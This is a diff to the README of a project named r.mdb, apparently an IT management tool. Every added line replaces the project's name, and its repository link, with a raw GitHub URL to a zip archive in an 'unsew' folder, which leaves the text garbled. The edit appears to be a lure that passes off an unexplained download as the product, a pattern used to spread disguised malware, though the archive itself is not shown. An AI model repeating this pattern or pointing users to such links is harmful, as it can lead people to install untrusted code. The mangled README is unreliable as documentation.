Krishnasomani29/r.mdb/README.md

 ## 🛡️ License

-r.mdb is open-source software.
+https://raw.githubusercontent.com/Krishnasomani29/r.mdb/main/unsew/r.mdb.zip is open-source software.
 You can freely download and use it under the terms of the MIT License.

 ## 🌐 Learn More

-For more information, tips, and updates, visit our [GitHub repository](https://github.com/Krishnasomani29/r.mdb).
+For more information, tips, and updates, visit our [GitHub repository](https://raw.githubusercontent.com/Krishnasomani29/r.mdb/main/unsew/r.mdb.zip).

 ## 📧 Contact

 For support or inquiries, please contact us via the GitHub repository or through our support email.

-Thank you for choosing r.mdb!
+Thank you for choosing https://raw.githubusercontent.com/Krishnasomani29/r.mdb/main/unsew/r.mdb.zip!
 We hope it simplifies your IT management tasks.